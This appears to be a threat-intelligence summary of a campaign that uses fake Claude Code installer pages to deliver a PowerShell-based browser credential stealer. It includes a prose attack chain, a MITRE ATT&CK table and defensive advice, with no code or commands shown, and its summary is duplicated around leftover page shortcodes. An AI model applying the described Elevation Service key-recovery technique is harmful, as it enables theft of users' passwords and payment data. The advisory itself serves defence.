EXECUTIVE SUMMARY
The campaign is a targeted attack on developers through fake installation pages mimicking popular developer tools, including counterfeit Claude Code installers. These lures swap legitimate one-line installers for attacker-controlled commands, with the goal of retrieving sensitive data, including cookies, saved passwords, and payment methods, from compromised browsers. The attack has been observed targeting multiple regions, although the exact scope is unclear. The attackers' motivations appear to be financial, as they seek to exploit sensitive user information for illicit gain.[/subscribe_to_unlock_form]
EXECUTIVE SUMMARY
The campaign is a targeted attack on developers through fake installation pages mimicking popular developer tools, including counterfeit Claude Code installers. These lures swap legitimate one-line installers for attacker-controlled commands, with the goal of retrieving sensitive data, including cookies, saved passwords, and payment methods, from compromised browsers. The attack has been observed targeting multiple regions, although the exact scope is unclear. The attackers' motivations appear to be financial, as they seek to exploit sensitive user information for illicit gain.[emaillocker id="1283"]
The malware infection occurs through a fake installation page that mimics the authentic installation command for Claude Code. The victim is tricked into pasting a malicious command, which retrieves an obfuscated PowerShell loader from a controlled domain. The loader then downloads and executes a native helper, which invokes the browser's Elevation Service to recover the App-Bound Encryption key. The PowerShell stage exfiltrates decrypted cookies, passwords, and payment methods, while the native helper maintains control through a named pipe. The PowerShell loader maintains persistence through a scheduled task, which polls a controlled domain for follow-up tasks.
This threat is significant for organisations as it demonstrates a sophisticated attack chain that exploits the Chrome ABE feature. The attack's use of a native helper and PowerShell loader makes it challenging to detect and recover from, as traditional behavioural detection methods may not be effective. Organisations should take defensive actions, including enabling PowerShell Constrained Language Mode, blocking the execution of potentially obfuscated scripts, and verifying that AMSI is enabled and monitoring for AMSI tamper events. Additionally, organisations should implement MDE Web Content Filtering and require phishing-resistant MFA authentication strength for admin and developer accounts.
THREAT PROFILE:
| Tactic | Technique ID | Technique | Sub-technique |
| Initial Access | T1189 | Drive-by Compromise | — |
| Execution | T1059.001 | Command and Scripting Interpreter | PowerShell |
| Persistence | T1053.005 | Scheduled Task/Job | Scheduled Task |
| Privilege Escalation | T1055.012 | Process Injection | Process Hollowing |
| Defense Evasion | T1027.002 | Obfuscated Files or Information | Software Packing |
| Credential Access | T1555.003 | Credentials from Password Stores | Credentials from Web Browsers |
| Collection | T1119 | Automated Collection | — |
| Command and Control | T1071.001 | Application Layer Protocol | Web Protocols |
| Exfiltration | T1567.001 | Exfiltration Over Web Service | Exfiltration to Code Repository |
REFERENCES:
The following reports contain further technical details:
https://www.csoonline.com/article/4169992/fake-claude-code-takes-the-ielevator-to-your-browser-secrets.html
https://www.ontinue.com/resource/blog-behind-a-fake-claude-code-installer/